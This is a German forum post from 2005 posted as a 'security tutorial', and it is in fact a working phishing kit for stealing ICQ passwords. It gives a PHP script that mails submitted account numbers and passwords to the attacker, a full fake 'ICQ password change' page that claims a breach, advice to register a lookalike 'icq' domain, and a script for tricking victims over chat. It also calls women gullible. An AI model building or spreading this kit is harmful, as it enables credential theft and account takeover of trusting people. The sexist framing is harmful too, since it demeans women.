ICQ passwörter rausfinden

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Roadkiller, 6. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 6. August 2005
    Das ist mein erstes Tut das ich geschriebn habe, bei Fragn könnt ihr euch per PN bei mir melden.

    Dieser Trick funktioniert leider nur bei gutgläubigen Menschen die sich in Sachen Pc nich auskennen (also Fraun ). Als erstes müsst ihr ein kleines PHP-Script schreibn das etwa so aussieht:
    Code:
    <?
 $sender = $_POST[ 'icquin' ];
 $sendermail = "localhost";
 $empfaenger = "eure E-mailadresse";
 $betreff = "ICQUIN";
 $text = $_POST[ 'passwort' ];
 
//nix ändern!
mail($empfaenger, $betreff, $text,
 "From: $sender <$sendermail>");
 ?>
    So als nächstes braucht ihr ein Formular das die Person ausfüllen soll. Ich habe schon eins erstellt, man muss das design natürlich an icq anpassen.
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ICQ Passwortänderung</title>
</head>
<body>
<h3 style="font-family:comic sans ms;">ICQ Passwortänderung</h3>
 <p style="font-family:comic sans ms;"> Aufgrund einer Sicherheitslücke in unseren System, konnten sich unbekannte Hacker in das System einloggen und alle Kundendaten abrufen, wir bitten Sie mit diesem Formular ihr Passwort zu ändern, damit ihr Account von unbefugten Zugriff sicher ist. Falls die Passwortänderung erfolgreich war werden sie auf eine Bestätigungsseite weitergeleitet, wo sie ihre Passwortänderung nochmal bestätigen müssen. Wir bitten um ihr Verständniss.
 <p style="font-family:comic sans ms;">Füllen sie das Formular korrekt aus.
 </p>
 <form style="font-family:comic sans ms;" action="pass.php" method="post">
 <p>Ihre ICQ Nummer:<br>

 <input style="font-family:comic sans ms;" name="icquin" type="text" size="15" maxlength="15">
 </p>
 <p>Ihr altes Passwort:<br>
 <input style="font-family:comic sans ms;" name="passwort" type="text" size="15" maxlength="15"><br>
 <p>Ihr neues Passwort:</p>
 <input style="font-family:comic sans ms;" name="newpassword" type="password" size="15 maxlenght="15"><br>
 <p>Bitte wiederholen:</p>
 <input style="font-family:comic sans ms;" name="newpassword" type="password" size="15 maxlenght="15"><br>
 <br> <input style="font-family:comic sans ms;" value="Passwort ändern" type="submit" target="2" />
 </p>
</form>
</body>
</html>
    Als nächstes lädt ihr beide Datein auf einen PHP fähigen Webserver hoch und besorgt euch eine free domain die "icq" enthält.
    Das sieht da etwa so aus: www.icq-online.de.vu
    Jetzt schreibt ihr euer Opfer per Icq eine nachricht in der ihr fragt ob die gestern Nachrichten geguckt habn, dann schickt man ihn den link und sagt das Icq gehackt worden ist. Wenn das Opfer nich besonders schlau is was ich annehme wird es das Formular ausfüllen. Danach müsst ihr nur noch euer Postfach checkn.

    Würde mich über Feedback per PN freuen da es mein erste Tut is.
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.